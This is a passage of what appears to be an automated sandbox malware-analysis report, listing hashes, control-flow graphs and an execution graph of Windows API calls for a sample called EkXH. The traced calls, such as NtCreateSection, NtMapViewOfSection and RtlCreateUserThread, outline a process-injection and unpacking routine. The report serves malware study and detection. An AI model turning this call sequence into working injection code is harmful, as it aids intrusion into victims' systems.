                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 63008dc5455b26ae5173438af7152297074d919cf4c282978a0906f11fd1f4e8
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 07526B74A11229DFDB64CF98D984BA8BBB1BF09304F1480D9E50DAB352DB30AE95DF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                    APIs
                    • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406611305.000000000040B000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_EkXH.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-3916222277
                    • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                    • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                    • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                    • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 477 220e0f-220e24 SetErrorMode * 2 478 220e26 477->478 479 220e2b-220e2c 477->479 478->479
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E1E
                    Memory Dump Source
                    • Source File: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_220000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: f23233c31a1da53253dfcacb42dea6b2ddc5ffc9e64891eed547aff6082d6eb8
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 1DD0123114512877D7002ED4DC09BCD7B1CDF09B62F008411FB0DD9081C7B0994046E5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 537 66bfd6-66c010 call 66c2e9 540 66c012-66c045 VirtualAlloc call 66c063 537->540 541 66c05e 537->541 543 66c04a-66c05c 540->543 541->541 543->541
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0066C027
                    Memory Dump Source
                    • Source File: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, Offset: 00669000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_669000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: cc01a80ffbd586d49ee8cb0a6462934bc7dd11d7276ed7015fb97a4fe5d4048c
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: C2113F79A00208EFDB01DF98C985E98BBF5AF08750F058095F9889B361D371EA50DF84
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                    APIs
                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                    Memory Dump Source
                    • Source File: 00000004.00000002.406611305.000000000040B000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_EkXH.jbxd
                    Similarity
                    • API ID: AllocLocal
                    • String ID:
                    • API String ID: 3494564517-0
                    • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                    • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                    • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                    • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_220000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: a1368690eb1bf0129f82696e878bee6ebb4af28ed6ea8f51c4a445d236bbdf64
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: 9E319DB2910219DFDB10CF88D880AADBBF5FF08724F14404AD401A7312C3B0EA94CFA4
                    APIs
                    • Sleep.KERNEL32(003FD056,00000199,00002EEF), ref: 00403324
                    • NtQueryInformationProcess.NTDLL(00401849,0040184D), ref: 00403390
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: InformationProcessQuerySleep
                    • String ID:
                    • API String ID: 1755194290-0
                    • Opcode ID: b8994af0357dffb864cba80c531728fcc33417444cd84a2fde152427c3d87875
                    • Instruction ID: b75b62001eae888a98cc4b5e6a3bdcfa433965c6df7774739083067f19da6379
                    • Opcode Fuzzy Hash: b8994af0357dffb864cba80c531728fcc33417444cd84a2fde152427c3d87875
                    • Instruction Fuzzy Hash: 0F41112040D6C18FC7128F3489A26A67F68FD1371271841EFD881AE7E2C6399B07D35A
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                    • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                    • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                    • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                    Memory Dump Source
                    • Source File: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, Offset: 00669000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_669000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 084209fc7df0b4d5b0943857c66b98c1aa3b9ce9f2befbe691522d2c842848ed
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 3A113C72340100EFD754DF59DC91FA673EAEB89320B298069E905CB316EB76E952C760
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                    • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                    • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                    • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                    • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                    • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                    • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                    • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                    • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                    • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                    • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                    • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                    • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                    • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                    • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                    • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                    • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                    • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                    • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                    Memory Dump Source
                    • Source File: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_220000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: f41f70d4de0e9ea93270b67a425b979dda617f3a5c679f025cc64dfca50b111f
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 0B012B766116109FDF21CFA0E884FAA33F9FB86305F0544B4D906D7243E770A841CB80
                    APIs
                    • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                    Memory Dump Source
                    • Source File: 00000004.00000002.406611305.000000000040B000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_EkXH.jbxd
                    Similarity
                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                    • String ID:
                    • API String ID: 2776817195-0
                    • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                    • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                    • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                    • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                    APIs
                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406611305.000000000040B000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_EkXH.jbxd
                    Similarity
                    • API ID: BuildCommEnvironmentFreeStrings
                    • String ID: -
                    • API String ID: 2991353152-2547889144
                    • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                    • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                    • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                    • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                    Execution Graph

                    Execution Coverage:8.6%
                    Dynamic/Decrypted Code Coverage:18.1%
                    Signature Coverage:0%
                    Total number of Nodes:171
                    Total number of Limit Nodes:6
                    execution_graph 4092 402e42 4095 402e47 4092->4095 4093 402f18 4094 401902 8 API calls 4093->4094 4097 402f4c 4093->4097 4094->4097 4095->4093 4096 4020ea NtQuerySystemInformation 4095->4096 4095->4097 4096->4093 4174 401747 4175 401755 4174->4175 4177 4017e2 4175->4177 4178 40180d 4177->4178 4181 40332a 4178->4181 4180 401841 4180->4175 4183 403309 4181->4183 4182 403321 Sleep 4182->4183 4183->4181 4183->4182 4185 403311 4183->4185 4186 4032bd 4183->4186 4184 4033bb 4185->4184 4187 403375 NtQueryInformationProcess 4185->4187 4186->4180 4187->4185 4289 418986 4290 418990 4289->4290 4291 418940 SetPriorityClass 4290->4291 4292 4189ad 4290->4292 4291->4290 4188 22092b GetPEB 4189 220972 4188->4189 4235 40190e 4236 401912 4235->4236 4238 4018b5 4235->4238 4237 401946 Sleep 4236->4237 4239 401961 4237->4239 4240 401529 7 API calls 4239->4240 4241 401972 4239->4241 4240->4241 4190 401750 4191 40174b 4190->4191 4192 4017e2 2 API calls 4191->4192 4192->4191 3965 418ed0 3968 418a70 3965->3968 3967 418ed5 3969 418a7d 3968->3969 3970 418b80 7 API calls 3969->3970 3971 418cc6 3969->3971 3973 418bf8 7 API calls 3970->3973 3972 418cd4 SetCommState 3971->3972 3978 418ced 3971->3978 3972->3971 3974 418ca4 3973->3974 3975 418c98 ObjectPrivilegeAuditAlarmW 3973->3975 3976 418cb5 3974->3976 3977 418cad WaitForSingleObject 3974->3977 3975->3974 3976->3971 3977->3976 3979 418daa 3978->3979 3980 418cfa 9 API calls 3978->3980 3992 418740 LocalAlloc 3979->3992 3986 418d88 3980->3986 3984 418daf LoadLibraryA 3993 418770 GetModuleHandleW GetProcAddress VirtualProtect 3984->3993 3985 418dfd 3994 4189d0 3985->3994 3986->3979 3988 418e02 3989 418e43 InterlockedCompareExchange 3988->3989 3990 418e23 MoveFileW 3988->3990 3991 418e5d 3988->3991 3989->3988 3990->3988 3991->3967 3992->3984 3993->3985 3995 4189f9 QueryDosDeviceW 3994->3995 3996 418a0a 3994->3996 3995->3996 4005 418910 3996->4005 3999 418a25 4008 418950 3999->4008 4000 418a1d FreeEnvironmentStringsA 4000->3999 4003 418a3c HeapCreate GetNumaProcessorNode 4004 418a57 4003->4004 4004->3988 4006 418921 FatalAppExitA GetModuleHandleA 4005->4006 4007 418933 4005->4007 4006->4007 4007->3999 4007->4000 4009 41896c 4008->4009 4010 41895e BuildCommDCBA 4008->4010 4011 418974 FreeEnvironmentStringsA 4009->4011 4014 41897c 4009->4014 4010->4014 4011->4014 4012 4189ad 4012->4003 4012->4004 4014->4012 4015 418940 4014->4015 4018 4188c0 4015->4018 4019 4188eb 4018->4019 4020 4188dc SetPriorityClass 4018->4020 4019->4014 4020->4019 4104 4014db 4105 40148f 4104->4105 4115 401469 4104->4115 4105->4104 4106 4015d5 NtDuplicateObject 4105->4106 4105->4115 4107 4015f2 NtCreateSection 4106->4107 4106->4115 4108 401672 NtCreateSection 4107->4108 4109 401618 NtMapViewOfSection 4107->4109 4111 40169e 4108->4111 4108->4115 4109->4108 4110 40163b NtMapViewOfSection 4109->4110 4110->4108 4113 401659 4110->4113 4112 4016a8 NtMapViewOfSection 4111->4112 4111->4115 4114 4016cf NtMapViewOfSection 4112->4114 4112->4115 4113->4108 4114->4115 4054 22003c 4055 220049 4054->4055 4067 220e0f SetErrorMode SetErrorMode 4055->4067 4060 220265 4061 2202ce VirtualProtect 4060->4061 4063 22030b 4061->4063 4062 220439 VirtualFree 4066 2204be LoadLibraryA 4062->4066 4063->4062 4065 2208c7 4066->4065 4068 220223 4067->4068 4069 220d90 4068->4069 4070 220dad 4069->4070 4071 220dbb GetPEB 4070->4071 4072 220238 VirtualAlloc 4070->4072 4071->4072 4072->4060 4073 99b746 4074 99b74a 4073->4074 4076 99b756 4073->4076 4077 99b757 4074->4077 4078 99b766 4077->4078 4081 99bef7 4078->4081 4087 99bf12 4081->4087 4082 99bf1b CreateToolhelp32Snapshot 4083 99bf37 Module32First 4082->4083 4082->4087 4084 99bf46 4083->4084 4086 99b76f 4083->4086 4088 99bbb6 4084->4088 4086->4076 4087->4082 4087->4083 4089 99bbe1 4088->4089 4090 99bc2a 4089->4090 4091 99bbf2 VirtualAlloc 4089->4091 4090->4090 4091->4090 4246 401922 4247 401930 4246->4247 4248 401946 Sleep 4247->4248 4249 401961 4248->4249 4250 401529 7 API calls 4249->4250 4251 401972 4249->4251 4250->4251 4268 401534 4269 401546 4268->4269 4270 4015d5 NtDuplicateObject 4269->4270 4277 4016f1 4269->4277 4271 4015f2 NtCreateSection 4270->4271 4270->4277 4272 401672 NtCreateSection 4271->4272 4273 401618 NtMapViewOfSection 4271->4273 4275 40169e 4272->4275 4272->4277 4273->4272 4274 40163b NtMapViewOfSection 4273->4274 4274->4272 4278 401659 4274->4278 4276 4016a8 NtMapViewOfSection 4275->4276 4275->4277 4276->4277 4279 4016cf NtMapViewOfSection 4276->4279 4278->4272 4279->4277 4021 402ffa 4022 403024 4021->4022 4023 40313d 4021->4023 4022->4023 4024 4030df RtlCreateUserThread NtTerminateProcess 4022->4024 4024->4023 4025 402ebc 4026 402eb4 4025->4026 4027 402f4c 4026->4027 4028 402f18 4026->4028 4031 4020ea 4026->4031 4028->4027 4036 401902 4028->4036 4032 4020fb 4031->4032 4033 40214e 4032->4033 4034 402152 NtQuerySystemInformation 4032->4034 4035 40216e 4032->4035 4033->4032 4033->4034 4034->4033 4035->4028 4037 401913 4036->4037 4038 401946 Sleep 4037->4038 4039 401961 4038->4039 4041 401972 4039->4041 4042 401529 4039->4042 4041->4027 4043 401539 4042->4043 4044 4016f1 4043->4044 4045 4015d5 NtDuplicateObject 4043->4045 4044->4041 4045->4044 4046 4015f2 NtCreateSection 4045->4046 4047 401672 NtCreateSection 4046->4047 4048 401618 NtMapViewOfSection 4046->4048 4047->4044 4050 40169e 4047->4050 4048->4047 4049 40163b NtMapViewOfSection 4048->4049 4049->4047 4052 401659 4049->4052 4050->4044 4051 4016a8 NtMapViewOfSection 4050->4051 4051->4044 4053 4016cf NtMapViewOfSection 4051->4053 4052->4047 4053->4044 4116 4020fc 4117 402107 4116->4117 4118 402152 NtQuerySystemInformation 4117->4118 4119 40216e 4117->4119 4118->4117

                    Control-flow Graph

                    • Executed
                    • Not Executed
